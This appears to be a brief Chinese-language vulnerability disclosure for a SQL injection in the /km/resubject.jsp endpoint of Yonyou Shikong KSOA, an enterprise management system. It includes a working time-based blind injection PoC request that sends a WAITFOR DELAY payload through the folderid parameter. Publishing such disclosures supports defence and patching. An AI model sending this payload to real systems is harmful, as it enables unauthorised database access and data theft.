用友时空KSOA /km/resubject.jsp SQL 注入漏洞

2026-04-17 用友时空KSOA PoC Public

Description

用友时空KSOA(Key Soft of Architecture)是用友网络科技股份有限公司推出的大型企业集团管理软件,基于SOA架构设计,涵盖财务管理、供应链管理、人力资源管理、客户关系管理、项目管理等核心业务模块,广泛应用于大型集团企业、跨国公司、政府机关等组织。该系统采用Java EE技术架构,支持多组织、多账簿、多币种、多语言的复杂业务场景。用友时空KSOA的 /km/resubject.jsp 接口存在SQL注入漏洞,攻击者可通过 folderid 参数构造恶意SQL语句,利用 WAITFOR DELAY 函数进行时间盲注攻击,获取数据库敏感信息。

PoC

GET /km/resubject.jsp?folderid=';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities